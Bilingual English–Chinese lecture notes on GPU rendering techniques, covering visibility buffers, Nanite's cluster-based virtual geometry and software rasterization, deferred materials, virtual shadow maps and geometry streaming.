    • 8k2 texture cache atlas

      8k2 纹理缓存图集

    • DirectX 11 code path

      DirectX 11 代码路径

    • 64 vertex clusters (strips)

      64 个顶点簇(条带)

    • No ExecuteIndirect / MultiDrawIndirect

      不执行间接/多画间接

    • Only two DrawInstancedIndirect calls

      只有两个 DrawInstancendirect 调用

    webp

    webp

    Fast Occlusion for Shadow

    快速遮挡阴影

    For each cascade

    对于每个级联

    • Generate camera depth reprojection (64x64 pixel)

      生成相机深度重投影(64x64 像素)

    • Then combine with last frame’s shadow depth reprojection

      然后结合上一帧的阴影深度重投影

    • Generate hierarchy-Z buffer for GPU culling

      生成用于 GPU 剔除的分层 Z-缓冲区

    webp

    Camera Depth Reprojection for Shadow Culling

    用于阴影消隐的相机深度重投影

    Motivation

    动机

    • It is essential to cull objects in light view, which does not cast a visible shadow

      在光线视角下剔除物体至关重要,因为光线视角不会投射出可见的阴影

    Implementation

    实施

    • Get camera visible areas that may appear shadow

      获取可能出现阴影的相机可见区域

    • For each 16*16screen tile, construct a cube (each yellow frustum) according to min/max depth in this tile.

      对于每个 16*16 的屏幕图块,根据该图块中的最小/最大深度构造一个立方体(每个黄色平截头体)。

    • Render max depth of these cubes in the light view

      在灯光视图中渲染这些立方体的最大深度

    • All objects that far from depth can be culled because they certainly do not contribute to visible shadow

      所有远离深度的物体都可以被剔除,因为它们肯定不会产生可见的阴影

    webp

    Best Cases of Camera Depth Reprojection

    相机深度重投影的最佳案例

    webp

    Visibility Buffer

    可见性缓冲区

    Recap - Deferred Shading, G-Buffer

    回顾-延迟着色,G-缓冲区

    • Forward rendering shades all fragments in triangle- submission order

      正向渲染为三角形中的所有片段着色-提交顺序

    • Wastes rendering power on pixels that don’t contribute to the final image

      在对最终图像没有贡献的像素上浪费渲染能力

    • Deferred shading solves this problem in 2steps:

      延迟着色通过两个步骤解决了这个问题:

    • First, surface attributes are stored in screen buffers -> G-Buffer

      首先,曲面属性存储在屏幕缓冲区 -> G-Buffer 中

    • Second, shading is computed for visible fragments only

      其次,仅对可见片段计算着色

    Deferred Shading

    延迟渲染

    webp

    Fat G-Buffer of Deferred Shading

    延迟遮光的 Fat G-Buffer

    • However, deferred shading increases memory bandwidth consumption:

      但是,延迟着色会增加内存带宽消耗:

      • Screen buffers for: normal, depth, albedo, material ID,…

        屏幕缓冲区用于:正常、深度、反照率、材质 ID,…

      • G-Buffer size becomes challenging at high resolutions

        G-缓冲区大小在高分辨率下变得具有挑战性

    webp

    Challenges of Complex Scene

    复杂场景的挑战

    webp

    webp

    Visibility Buffer - Filling

    可见性缓冲区-填充

    • Visibility Buffer generation step

      可见性缓冲区生成步骤

    • For each pixel in screen:

      对于屏幕中的每个像素:

      • Pack (alpha masked bit, drawID, primitiveID) into one 32-bit UINT

      • 将(alpha 掩码位、drawID、primitiveID)打包成一个 32 位的 UINT

      • Write that into a screen-sized buffer

        将其写入屏幕大小的缓冲区

    • The tuple (alpha masked bit, drawID, primitiveID) will allow a shader to access the triangle data in the shading step

      元组(alpha 掩码位、drawID、primitiveID)将允许着色器在着色步骤中访问三角形数据

    webp

    Visibility Buffer - Shading

    可见性缓冲区-着色

    • For each pixel in screen-space we do:

      对于屏幕空间中的每个像素,我们做:

    • Get drawID/triangleID at pixel pos

      在像素位置获取 drawID/trangleID

    • Load data for the 3 vertices from the VB

      从 VB 加载 3 个顶点的数据

    • Compute triangle gradients

      计算三角形梯度

    • Interpolate vertex attributes at pixel pos using gradients

      使用渐变在像素位置插值顶点属性

      • Attribs use w from position to compute perspective correct interpolation

        属性使用 w 从位置计算透视校正插值

      • MVP matrix is applied to position

        MVP 矩阵应用于定位

    • We have all data ready: shade and calculate final color

      我们已经准备好所有数据:阴影和计算最终颜色

    Pipeline of Visibility Buffer

    可见性缓冲管道

    webp

    Visibility Buffer + Deferred Shading

    可见性缓冲区+延迟着色

    webp

    Correct Texture Mipmap with Gradient Without

    无渐变的正确纹理 Mipmap

    webp

    Results

    Total

    • 8 Million Triangles
    • 5 Million Vertices

    webp

    Visibility Buffer

    GPU AMD RADEON R9 3801080p1440p2160p
    No MSAA8.5710.7215.19
    No MSAA – No Culling14.5215.8620.45
    2x MSAA11.4416.3825.87
    4x MSAA15.2720.8237.86

    Deferred Shading

    GPU AMD RADEON R9 3801080p1440p2160p
    No MSAA9.7512.3020.19
    No MSAA – No Culling14.1616.624.06
    2x MSAA16.1623.0942.68
    4x MSAA24.9036.3769.64

    Virtual Geometry - Nanite

    虚拟几何-Nanite

    Challenges of Realistic Rendering

    webp

    Nanite Overview

    Nanite 概述

    • Overview

      概述

    • Geometry Representation

      几何表示法

      • Cluster-based LoD

        基于集群的 LoD

      • BVH and runtime LoD

        BVH 和运行时间 LoD

    • Rendering

      渲染图

      • Software and Hardware Rasterization

        软件和硬件光栅化

      • Visibility Buffer

        可见性缓冲区

      • Deferred Materials

        递延材质

      • Tile-based Acceleration

        基于瓷砖的加速

    • Virtual Shadow Map

      虚拟阴影贴图

    • Streaming and Compression

      流媒体和压缩

    Virtual Texture

    虚拟纹理

    • Build a virtual indexed texture to represent all blended terrain materials for whole scene

      构建一个虚拟索引纹理,以表示整个场景的所有混合地形材质

    • Only load materials data of tiles based on view depend LOD

      仅加载基于视图的 LOD 的瓷砖材质数据

    • Pre-bake materials blending into tile and store them into physical textures

      预烘烤材质混合到瓷砖中,并将其储存成物理纹理

    webp

    The Dream

    理想

    • Virtualize geometry like we did textures

      像纹理一样虚拟化几何体

      • No more budgets

        没有更多预算

        • Poly count

          多边形计数

        • Draw calls

        • Memory

          记忆

    • Directly use film quality source art

      直接使用电影质量的源艺术

      • No manual optimization required

        无需手动优化

    • No loss in quality

      质量无损失

    Reality

    现实

    • MUCH harder than virtual texturing

      比虚拟纹理硬得多

      • Not just memory management

        不仅仅是内存管理

      • Geometry detail directly impacts rendering cost

        几何体细节直接影响渲染成本

      • Geometry is not trivially filterable (SDF, Voxels, Point Clouds)

        几何体不能轻易过滤(SDF、体素、点云)

    Voxels?

    体素?

    • Spatially uniform data distribution

      空间均匀的数据分布

    • Big memory consumption

      内存消耗大

    • Attribute leaking

      属性泄漏

    webp

    • Not interested in completely changing all CG workflow

      对完全改变所有 CG 工作流程不感兴趣

      • Support importing meshes authored anywhere

        支持导入在任何地方编写的网格

      • Still have UVs and tiling detail maps

        仍然有 UV 和平铺细节贴图

      • Only replacing meshes, not textures, not materials, not tools

        仅替换网格,不替换纹理,不替换材质,不替换工具

    • Never ending list of hard problems

      永无止境的难题清单

    Subdivision Surfaces?

    细分曲面?

    • Subdivision by definition is amplification only

      根据定义,细分只是放大

    • Great for up close but doesn’t get simpler than base mesh

      非常适合近距离拍摄,但不会比基础网眼更简单

    • Sometimes produces an excessive number of triangles

      有时会产生过多的三角形

    webp

    Maps-based Method?

    基于地图的方法?

    • Works well for organic surfaces that already are uniformly sampled

      适用于已经均匀取样的有机表面

    • Difficult to control hard surface features

      难以控制的硬表面特征

    • Sometimes object surface is not connected

      有时物体表面不连接

    webp

    Point Cloud?

    点云?

    • Massive amounts of overdraw

      大量透支

    • Requires hole filling

      需要补孔

    webp

    https://highperformancegraphics.org/slides22/Software_Rasterization_of_2_Billion_Points_in_Real_Time.pptx

    webp

    Foundation of Computer Graphics

    计算机图形学基础

    • The most elemental, atomic unit of surface area in 3D space

      三维空间中最基本的原子表面积单位

    • Every surface can be turned into triangles

      每个曲面都可以变成三角形

    webp

    Nanite Geometry Representation

    Nanite 几何表示法

    Screen Pixels and Triangles

    屏幕像素和三角形

    • Linear scaling in instances can be ok

      实例中的线性缩放是可以的

    • Linear scaling in triangles is not ok

      三角形中的线性缩放是不合适的

    Why should we draw more triangles than screen pixels?

    为什么我们应该绘制比屏幕像素更多的三角形?

    webp

    Represent Geometry by Clusters

    按簇表示几何体

    webp

    View Dependent LOD Transitions – Better than AC Solutions

    视图相关 LOD 转换——优于 AC 解决方案

    webp

    Similar Visual Apperance with 1/30 Rendering Cost!

    相似的视觉效果,渲染成本为 1/30!

    webp

    Naïve Solution - Cluster LoD Hierarchy

    幼稚的解决方案-集群 LoD 层次结构

    • Decide LOD on a cluster basis

      基于集群确定 LOD

    • Build a hierarchy of LODs

      构建 LOD 层次结构

      • Simplest is tree of clusters

        最简单的是集群树

      • Parents are the simplified versions of their children

        父母是孩子的简化版本

    webp

    Naïve Solution - Decide Cluster LOD Run-time

    天真的解决方案-确定集群 LOD 运行时间

    • Find cut of the tree for desired LOD

      找到所需 LOD 的树木切割

    • View dependent based on perceptual difference

      基于感知差异的视图依赖

    webp

    Naïve Solution – Simple Streaming Idea

    天真的解决方案——简单的流媒体创意

    • Entire tree doesn’t need to be in memory at once

      整个树不需要一次出现在内存中

    • Can mark any cut of the tree as leaves and toss the rest

      可以将树上的任何切口标记为叶子,然后扔掉剩下的

    • Request data on demand during rendering

      渲染过程中按需请求数据

      • Like virtual texturing

        类似于虚拟纹理

    webp

    But, How to Handle LOD Cracks

    但是,如何处理 LOD 裂缝

    • If each cluster decides LOD independent from neighbors, cracks!

      如果每个集群独立于邻居决定 LOD,那么就会破裂!

    • Naive solution:

      天真的解决方案:

      • Lock shared boundary edges during simplification

        在简化过程中锁定共享边界边

      • Independent clusters will always match at boundaries

        独立集群将始终在边界处匹配

    webp

    Locked Boundaries? Bad Results

    锁定边界?糟糕的结果

    • Collects dense cruft

      收集稠密的原油

    • Especially between deep subtrees

      尤其是在深子树之间

    webp

    webp

    Nanite Solution - Cluster Group

    Nanite 解决方案-集群集团

    • Can detect these cases during build

      可以在构建过程中检测到这些情况

    • Group clusters

      集团集群

    • Force them to make the same LOD decision

      迫使他们做出相同的 LOD 决定

    • Now free to unlock shared edges and collapse them

      现在可以自由解锁共享边并折叠它们

    webp

    Build Operations

    构建操作

    • Pick grouped these 4 adjacent clusters

      将这 4 个相邻的集群进行分组

    • Merge and Simplify the clusters to half the number of triangles

      将簇合并并简化为三角形数量的一半

    • Split simplified triangle list back into 2 new clusters

      将简化的三角形列表拆分回 2 个新集群

    • We now have reduced 4 4-triangle clusters to 2 4-triangle clusters

      我们现在已经将 4 个 4 三角聚类减少到 2 个 4 三角群集

    webp

    • Cluster original triangles

      对原始三角形进行聚类

    • While NumClusters > 1

      当 NumClusters > 1 时

      • Group clusters to clean their shared boundary

        将集群分组以清理其共享边界

      • Merge triangles from group into shared list

        将组中的三角形合并到共享列表中

      • Simplify to 50% the number of triangles

        将三角形的数量简化到 50%

      • Split simplified triangle list into clusters (128 tris)

        将简化的三角形列表拆分为簇(128 个 tris)

    Build Clusters

    构建集群

    webp

    Simplification on Cluster Group

    集群组的简化

    webp

    webp

    Alternate Group Boundaries between Levels

    级别之间的备用组边界

    • The key idea is to alternate group boundaries from level to level by grouping different clusters.

      关键思想是通过对不同集群进行分组,在不同级别之间交替设置组边界。

    • A boundary in one level becomes the interior in the next level

      一层中的边界成为下一层的内部

    • Locked one level, unlocked the next

      锁定一个级别,解锁下一个级别

    webp

    Cluster group boundaries for LoD0

    LoD0 的集群组边界

    Cluster group boundaries for LoD1

    LoD1 的集群组边界

    Cluster group boundaries for LoD2

    LoD2 的集群组边界

    DAG for Cluster Groups

    集群组的 DAG

    • Merge and split makes this a DAG instead of a tree

      合并和拆分使其成为 DAG 而不是树

      • This is a good thing in that you can’t draw a line from LOD0 all the way to the root without crossing an edge

        这是一件好事,因为你不能在不穿过边的情况下从 LOD0 一直画到根部

      • Meaning there can’t be locked edges that stay locked and collect cruft

        这意味着不可能有锁定的边缘保持锁定并收集碎屑

    webp

    Why DAG, not Tree (Trap!)

    为什么是 DAG,而不是树(陷阱!)

    Jungle of clusters, group and their links

    集群、群体及其联系的丛林

    webp

    Let’s Chop the Lovely Bunny

    webp

    Detail of Simplification - QEM

    简化细节-QEM

    webp

    webp

    Runtime LoD Selection

    运行时 LoD 选择

    View-Dependent LoD Selection on DAG?

    DAG 上的视图相关 LoD 选择?

    Group is faster than cluster, but DAG is still very complicated

    组比簇快,但 DAG 仍然非常复杂

    webp

    LOD Selection for Cluster Group

    聚类组的 LOD 选择

    • Two submeshes with same boundary, but different LOD

      具有相同边界但 LOD 不同的两个子板

    • Choose between them based on screen-space error

      根据屏幕空间错误在它们之间进行选择

      • Error calculated by simplifier projected to screen

        投影到屏幕上的简化器计算误差

      • Corrected for distance and angle distortion at worst-case point in sphere bounds

        针对球体边界中最坏情况点的距离和角度失真进行了校正

    • All clusters in group must make same LOD decision

      组中的所有集群都必须做出相同的 LOD 决策

      • How? Communicate? No!

        怎么办?沟通?不!

      • Same input => same output

        相同的输入 => 相同的输出

    webp

    LOD Selection in Parallel

    并行 LOD 选择

    • LOD selection corresponds to cutting the DAG

      LOD 选择对应于切割 DAG

      • How to compute in parallel?

        如何并行计算?

      • Don’t want to traverse the DAG at run-time

        不想在运行时遍历 DAG

    • What defines the cut?

      切割的定义是什么?

      • Difference between parent and child

        父母和孩子的区别

    • Draw a cluster when:

      在以下情况下绘制集群:

      • Parent error is too high && Our error is small enough

        父错误太高 & 我们的错误足够小

      • Can be evaluated in parallel!

        可以并行评估!

    webp

    • Only if there is one unique cut

      只有当有一个独特的切割

      • Force error to be monotonic

        力误差为单调

    • Parent view error >= child view error

      父视图错误 >= 子视图错误

    • Careful implementation to make sure runtime correction is also monotonic

      仔细实施以确保运行时校正也是单调的

    webp

    Core Equation of Parallel LoD Selection for Cluster Groups

    集群并行 LoD 选择的核心方程

    • When can we LOD cull a cluster?

      我们什么时候可以 LOD 剔除集群?

      • Render: ParentError > threshold && ClusterError <= threshold

        渲染:父错误 > 阈值 && ClusterError <= 阈值

      • Cull: ParentError <= threshold || ClusterError > threshold

    • Parent is already precise enough. No need to check child

      家长已经足够精确了。无需检查孩子

      • ParentError <= threshold

        父错误 <= 阈值

      • Tree based on ParentError, not ClusterError!

        基于 ParentError 的树,而不是 ClusterError!

    Isolated LoD Selection for Each Cluster Group

    每个集群组的独立 LoD 选择

    • Render: ParentError > threshold && ClusterError <= threshold
    • Cull: ParentError <= threshold || ClusterError > threshold

    webp

    BVH Acceleration for LoD Selection

    用于 LoD 选择的 BVH 加速

    Really Bad Explanation of Why and How about BVH

    关于 BVH 的原因和原因的糟糕解释

    • BVH4

      • Max of children’s ParentError

        儿童父母最大错误

      • Internal node: 4 children nodes

        内部节点:4 个子节点

      • Leaf node: List of clusters in group

        叶子节点:组中的簇列表

    Build BVH for Acceleration of LoD Selection

    构建 BVH 以加速 LoD 选择

    • 7,000,000 triangles will create 110,000 clusters

      7000000 个三角形将创建 110000 个簇

    • Iterating all cluster/cluster groups is too slow

      迭代所有集群/集群组太慢

    • Let’s build BVH for each LoD cluster groups

      让我们为每个 LoD 集群组构建 BVH

    webp

    Balance BVH for 4 Nodes

    平衡 4 个节点的 BVH

    webp

    Detail of BVH Acceleration

    • total 110437 clusters,

      总共 110437 个簇,

    • check bvh node = 107, check cluster = 4240,

      检查 bvh 节点 = 107、检查簇 = 4240

    • select cluster = 2175

      选择群集 = 2175

    webp

    Hierarchical Culling - Naive Approach

    分层剔除-朴素方法

    • Dependent DispatchIndirects

      依赖视差间接

      • One per level

        每层一个

    • Global synchronization

      全局同步

      • Wait for idle between every level

        在每个级别之间等待空闲

    • Worst case # of levels

      最坏情况下的级别数量

      • Empty dispatches at the end

        末尾为空调度

    • Can be mitigated by higher fanout

      可以通过更高的扇出来缓解

      • Wasteful for small/distant objects

        对小/远距离物体浪费

    webp

    Persistent Threads

    持久线程

    • Ideally

      理想情况下

      • Start on child as soon as parent finished

        父母一完成,就从孩子开始

      • Spawn child threads directly from compute

        直接从计算中生成子线程

    • Persistent threads model instead

      改为持久线程模型

      • Can’t spawn new threads. Reuse them instead!

        无法生成新线程。重复使用它们!

      • Manage our own job queue

        管理我们自己的作业队列

      • Single dispatch with enough worker threads to fill GPU

        单分派,具有足够的工作线程来填充 GPU

      • Use simple multi-producer multi-consumer (MPMC) job-queue to communicate between threads

        使用简单的多生产者多消费者(MPMC)作业队列在线程之间进行通信

    webp

    Nanite Rasterization

    Nanite 光栅化

    Pixel Scale Detail

    像素比例细节

    • Can we hit pixel scale detail with triangles > 1 pixel?

      我们可以用大于 1 像素的三角形来达到像素级的细节吗?

    • Depends how smooth

      取决于平滑程度

    • In general no

      一般来说,没有

    • Need to draw pixel sized triangles

      需要绘制像素大小的三角形

    webp

    Hardware Rasterization

    硬件光栅化

    • HW Rasterization unit is quad (2x2 pixels) for ddx and ddy

      对于 ddx 和 ddy,HW 光栅化单元为四边形(2x2 像素)

    • Need help pixels (yellow) to form quads

      需要帮助像素(黄色)来形成四边形

    webp

    • Use 4x4 tiled traversal to accelerate

      使用 4x4 平铺遍历来加速

    webp

    • A lot of wasting for small triangle

      小三角形浪费很多

    • tiled traversal stage is useless

      平铺遍历阶段毫无用处

    • quad generate 4x pixels than its really covered

      四边形产生的像素比实际覆盖的像素多 4 倍

    webp

    Software Rasterization for Tiny Triangles

    微小三角形的软件光栅化

    • Terrible for typical rasterizer

      对于典型的光栅化器来说很糟糕

    • Typical rasterizer:

      典型光栅化器:

      • Macro tile binning

        宏平铺

      • Micro tile 4x4

        微型瓷砖 4x4

      • Output 2x2 pixel quads

        输出 2x2 像素四边形

      • Highly parallel in pixels not triangles

        像素高度平行,而非三角形

    • Modern GPUs setup 4 tris/clock max

      现代 GPU 设置最大 4 tris / 时钟

      • Outputting SV_PrimitiveID makes it even worse

        输出 SV_PrimitiveID 会使情况变得更糟

    • Can we beat the HW rasterizer in SW?

      我们能在软件中击败硬件光栅化器吗?

    3x faster!

    webp

    Nanite – Rasterization

    Nanite-光栅化

    • Only rasterize 1 pixel when the triangle size smaller than 1 pixel in Shader function

      当着色器函数中的三角形尺寸小于 1 像素时,仅光栅化 1 像素

    • We will save 3 pixels compute resources if the triangle only covered in 1 pixel

      如果三角形只覆盖 1 个像素,我们将节省 3 个像素的计算资源

    • Reconstruct derivatives for ddx/ddy

      重建 ddx/ddy 的导数

    webp

    Scanline Software Rasterizer

    扫描线软件光栅化器

    • Per-cluster based rasterization selection

      基于每个集群的光栅化选择

      • All edges of cluster <18 pixels are SW rasterized

        所有小于 18 像素的簇边缘都进行了 SW 光栅化

    • Iterate over the rect tests a lot of pixels

      迭代 rect 测试大量像素

    • Best case half are covered

      最好的一半都包括在内

    • Worst case none are

      最坏的情况是没有

    • Scanline method is a choice

      扫描线方法是一种选择

    webp

    How To Do Depth Test?

    如何进行深度测试?

    • Don’t have ROP or depth test hardware

      没有 ROP 或深度测试硬件

    • Need Z-buffering

      需要 Z-缓冲

      • Can’t serialize at tiles

        无法在图块上序列化

      • Many tris may be in parallel for single tile or even single pixel

        对于单个图块甚至单个像素,许多 tris 可能是并行的

    • Use 64 bit atomics!

      使用 64 位原子!

    32257
    Depth
    深度
    Visible cluster index
    可见集群索引
    Triangle index
    三角形索引
    • InterlockedMax

      联锁 Max

      • Visibility buffer shows its true power

        可见性缓冲显示其真正的力量

    Nanite Visibility Buffer

    Nanite 可见性缓冲区

    NumberBits32257
    Type
    类型
    Depth
    深度
    Visible cluster index
    可见集群索引
    Triangle index
    三角形索引

    webp

    • Write geometry data to screen

      将几何数据写入屏幕

      • Depth : InstanceID : TriangleID

        深度:实例 ID:三角形 ID

    • Material shader per pixel:

      每像素材质着色器:

      • Load VisBuffer

        加载 VisBuffer

      • Load instance transform

        加载实例转换

      • Load 3 vert indexes

        加载 3 个涵洞索引

      • Load 3 positions

        加载 3 个位置

      • Transform positions to screen

        将位置转换到屏幕

      • Derive barycentric coordinates for pixel

        推导像素的重心坐标

      • Load and lerp attributes

        加载和 lerp 属性

    • Sounds crazy? Not as slow as it seems

      听起来很疯狂?没有看起来那么慢

      • Lots of cache hits

        大量缓存命中

      • No overdraw or pixel quad inefficiencies

        没有过度绘制或像素四边形效率低下

    • Material pass writes GBuffer

      物料传递写入 GBuffer

      • Integrates with rest of our deferred shading renderer

        与我们的其他延迟着色渲染器集成

    • Draw all opaque geometry with 1 draw

      用 1 次绘制绘制所有不透明几何体

      • Completely GPU driven

        完全由 GPU 驱动

      • Not just depth prepass

        不仅仅是深度预付

      • Rasterize triangles once per view

        每个视图对三角形进行一次栅格化

    Hardware Rasterization

    硬件光栅化

    • What about big triangles?

      大三角形呢?

    • Use HW rasterizer

      使用硬件光栅化器

    • Choose SW or HW per cluster

      为每个集群选择软件或硬件

    • Also uses 64b atomic writes to UAV

      还使用 64b 原子写入无人机

    webp

    Imposters for Tiny Instances

    微小实例的冒名顶替者

    • 12 x 12 view directions in atlas

      图集中 12 x 12 个视图方向

      • XY atlas location octahedral mapped to view direction

        XY 图集位置八面体映射到视图方向

      • Dithered direction quantization

        离散方向量化

    • 12 x 12 pixels per direction

      每个方向 12 x 12 像素

      • Orthogonal projection

        正交投影

      • Minimal extents fit to mesh AABB

        最小范围适合网眼 AABB

      • 8:8 Depth, TriangleID

        8:8 深度,三角形 ID

      • 40.5KB per mesh always resident

        每个网格始终驻留 40.5KB

    • Ray march to adjust parallax between directions

      光线行进以调整方向之间的视差

      • Few steps needed due to small parallax

        由于视差小,需要很少的步骤

    • Drawn directly from instance culling pass

      直接从实例剔除过程中提取

      • Bypassing visible instances list

        绕过可见实例列表

    • Would like to replace with something better

      想换个更好的

    webp

    Rasterizer Overdraw

    光栅过冲

    • No per triangle culling

      无每个三角形的剔除

    • No hardware HiZ culling pixels

      无硬件 HiZ 剔除像素

    • Our software HZB is from previous frame

      我们的软件 HZB 来自上一帧

      • Culls clusters not pixels

        剔除聚类而非像素

      • Resolution based on cluster screen size

        基于集群屏幕大小的分辨率

    • Excessive overdraw from:

      过度透支来自:

      • Large clusters

        大型集群

      • Overlapping clusters

        重叠集群

      • Aggregates

        骨料

      • Fast motion

        快速运动

    • Overdraw expense

      超支费用

      • Small tris: Vertex transform and triangle setup bound

        小三角:顶点变换和三角形设置边界

      • Medium tris: Pixel coverage test bound

        中等分辨率:像素覆盖率测试范围

      • Large tris: Atomic bound

        大三体:原子束缚

    webp

    Nanite Deferred Material

    Nanite 递延材质

    Deferred Material

    递延材质

    • Nanite want to support full artist created pixel shaders

      Nanite 希望支持完全由艺术家创建的像素着色器

    • In theory, all materials could be applied in a single pass, but there are complexities and inefficiencies there

      理论上,所有材质都可以一次性使用,但存在复杂性和效率低下的问题

    webp

    Material Shading

    材质着色

    • Common method

      常用方法

      • Draw a full screen quad per unique material

        为每种独特材质绘制全屏四边形

      • Skip pixels not matching this material

        跳过与此材质不匹配的像素

    • Disadvantages

      缺点

      • CPU unaware if some materials have no visible pixels (unfortunate side effect of GPU driven)

        CPU 不知道某些材质是否没有可见像素(GPU 驱动的不幸副作用)

      • So unnecessary drawing instructions will be committed

        因此,将提交不必要的图纸说明

    Shading Efficiency

    遮光效率

    • Hardware depth test!

      硬件深度测试!

      • Convert material ID to depth value

        将材质 ID 转换为深度值

    webp

    Shading

    • Then draw a full screen quad and set depth test function to “equal”, so unmatched pixels will be discarded

      然后绘制一个全屏四边形,并将深度测试功能设置为“相等”,这样不匹配的像素将被丢弃

    • But full screen quad is not necessary and can be improved!

      但全屏四屏不是必需的,可以改进!

    Material Sorting with Tile-Based Rendering

    基于平铺渲染的材质排序

    • We can do a screen tile material classification

      我们可以做一个筛网材质分类

    • For a certain material, exclude tiles that do not contain this material

      对于某种材质,排除不包含此材质的瓷砖

    webp

    Material Classify

    材质分类

    webp

    Material Classify - Material Tile Remap Table

    材质分类-材质瓷砖重绘表

    • Finally forms a material and tile remap table

      最后形成材质和瓷砖重映射表

    • Get the number of tiles based on the screen resolution and pack 32 tiles into a group

      根据屏幕分辨率获取图块数量,并将 32 个图块打包成一组

    • ‘MaterialRemapCount’ means the number of groups

      “MaterialRemapCount” 是指组的数量

    • Record the tiles in which a material is located by marking it by bit

      通过逐点标记来记录材质所在的瓷砖

    • This table can be used to calculate the tile position to render to

      此表可用于计算要渲染的图块位置

    webp

    Deferred Material Overall Process

    递延材质整体流程

    • Generate material resolve texture

      生成材质解析纹理

    • Generate material depth texture

      生成材质深度纹理

    • Classify screen tile materials

      对筛网材质进行分类

    • Generate G-Buffer

      生成 G-缓冲区

      • This will be output to the g-buffer to match with the rest of the pipeline

        这将被输出到 g-buffer,以与管道的其余部分相匹配

      • Commit drawing commands per material

        按材质提交绘图命令

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    void UnpackMaterialResolve(uint Packed,
    out bool IsNanitePixel,
    out bool IsDecalReceiver,
    out uint MaterialSlot)
    {
    IsNanitePixel = BitFieldExtractU32(Packed,10) != 0;
    MaterialSlot = BitFieldExtractU32(Packed, 14, 1);
    IsDecalReceiver = BitFieldExtractU32(Packed, 1, 15) != 0:

    Shadows

    Micropoly Level Detail for Shadows

    阴影的微多层细节

    webp

    Nanite Shadows - Ray Trace?

    Nanite 阴影-射线追踪?

    • Ray trace?

      射线追踪?

    • There are more shadow rays than primary since there are on average more than 1 light per pixel

      由于每个像素平均有 1 个以上的光,因此阴影光线比主光线多

    • Custom triangle encoding

      自定义三角形编码

    • No partial BVH updates

      无部分 BVH 更新

    • HW triangle formats + BLAS (bottom level acceleration structure) currently are 3-7x the size of Nanite data

      HW 三角形格式 + BLAS(底层加速结构)目前是 Nanite 数据大小的 3-7x

    webp

    RTX 40XX,50XX? Radeon RX 70XX…?

    Recap Cascaded Shadow Map

    回顾级联阴影图

    • Relatively coarse LOD control

      LOD 控制相对粗糙

    • If better shadow detail is desired, there is still significant memory consumption

      如果需要更好的阴影细节,仍然会消耗大量内存

    webp

    Sample Distribution Shadow Maps

    示例分布阴影图

    • Gives a better cascaded map coverage by analysing the range of screen pixel depths

      通过分析屏幕像素深度范围,提供更好的级联地图覆盖率

    • An optimized cascaded shadow map but still has coarse LOD control

      优化的级联阴影贴图,但仍具有粗略的 LOD 控制

    webp

    webp

    Virtual Shadow Map - A Cached Shadow System!

    虚拟阴影地图-缓存的阴影系统!

    • Most lights don’t move, should be cached as much as possible

      大多数灯光不会移动,应尽可能缓存

    webp

    Virtual Shadow Maps

    虚拟阴影地图

    • 16k x 16k virtual shadow map for each light (exception, point light with 6 VSMs)

      每个灯光的 16k x 16k 虚拟阴影贴图(具有 6 个 VSM 的点光源除外)

    webp

    Different Light Type Shadow Maps

    不同的灯光类型阴影贴图

    webp

    Shadow Page Allocation

    影子页面分配

    • Only visible shadow pixels need to be cached

      只需要缓存可见的阴影像素

      • For each pixel on screen

        对于屏幕上的每个像素

      • For all lights affecting this pixel

        对于影响此像素的所有灯光

      • Project the position into shadow map space

        将位置投影到阴影贴图空间

      • Pick the mip level where 1 texel matches the size of 1screen pixel

        选择 1 个纹理像素与 1 个屏幕像素大小匹配的 mip 级别

      • Mark the page as needed

        根据需要标记页面

      • Allocate physical page space for uncached pages

        为未缓存的页面分配物理页面空间

    Shadow Page Table and Physical Pages Pool

    影子页表和物理页池

    webp

    Shadow Page Cache Invalidation

    卷影页缓存无效

    • Camera movement, if the movement is relatively smooth, there will not be many pages to update

      相机移动,如果移动相对平稳,就不会有很多页面需要更新

    • Any light movement or rotation will invalidate all cached pages for that light

      任何灯光移动或旋转都会使该灯光的所有缓存页面无效

    • Geometry that casts shadows moving, or being added or removed from the scene will invalidate any pages that overlap its bounding box from the light’s perspective

      投射阴影的几何体在场景中移动、添加或删除,将使从灯光角度与其边界框重叠的任何页面无效。

    • Geometry using materials that may modify mesh positions

      使用可能修改网格位置的材质的几何体

    Shadow Demo

    webp

    Conclusions

    结论

    • Number of shadow pages proportional to screen pixels

      与屏幕像素成比例的阴影页数

    • Shadow cost scales with resolution and number of lights per pixel

      阴影成本随分辨率和每像素的灯光数量而变化

    webp

    Streaming and Compression

    流媒体和压缩

    Streaming

    流媒体

    • Virtualized geometry

      虚拟几何体

      • Unlimited geometry at fixed memory budget

        固定内存预算下的无限几何图形

    • Conceptually similar to virtual texturing

      概念上类似于虚拟纹理

      • GPU requests needed data then CPU fulfills them.

        GPU 请求所需的数据,然后 CPU 完成它们。

      • Unique challenges: must no cracks in the geometry

        独特的挑战:几何体中不得有裂纹

    • Cut DAG at runtime to only loaded geometry

      在运行时将 DAG 剪切为仅加载的几何体

      • Needs to always be a valid cut of full DAG

        需要始终是完整 DAG 的有效切割

      • Similar to LOD cutting. No cracks

        类似于 LOD 切割。无裂纹

    webp

    Paging

    分页

    • Fill fixed-sized pages with groups

      用组填充固定大小的页面

    • Based on spatial locality to minimize pages needed at runtime

      基于空间局部性,以最小化运行时所需的页面

      • Sort groups by mip and spatial locality

        按 mip 和空间位置对组进行排序

    • Root page (64k)

      根页面(64k)

      • First page contains top lod level(s) of DAG

        第一页包含 DAG 的顶级 lod 级别

      • Always resident on GPU so we always have something to render

        始终驻留在 GPU 上,所以我们总是有东西要渲染

    • Streaming Page (128k)

      流媒体页面(128k)

      • Other lod levels of cluster groups

        集群组的其他 lod 水平

      • Life time is managed by LRU on CPU

        寿命由 CPU 上的 LRU 管理

    • Page contents:

      页面内容:

      • Index data,Vertex data, Bounds, LOD info, Material tables, etc.

        索引数据、顶点数据、边界、LOD 信息、材质表等。

    webp

    Memory representation

    内存表示

    Vertex quantization and encoding

    顶点量化和编码

    • Global quantization

      全局量化

      • A combination of artist control and heuristics

        艺术家控制和启发式的结合

      • Clusters store values in local coordinates that is relative to value min/max range

        集群将值存储在相对于值最小/最大范围的局部坐标中

    • Per-cluster custom vertex format

      每簇自定义顶点格式

      • Uses minimum number of bits per component: ceil(log2(range))

        使用每个组件的最小位数:ceil(log2(range))

      • Just a string of bits, not even byte aligned

        只是一串比特,甚至没有字节对齐

    • Decoded using GPU bit-stream reader because of divergent encode format between clusters

      由于集群之间的编码格式不同,使用 GPU 比特流读取器进行解码

    webp

    Disk Representation

    磁盘表示法

    • Hardware LZ decompression

      硬件 LZ 解压

      • In consoles now and on its way to PC with DirectStorage

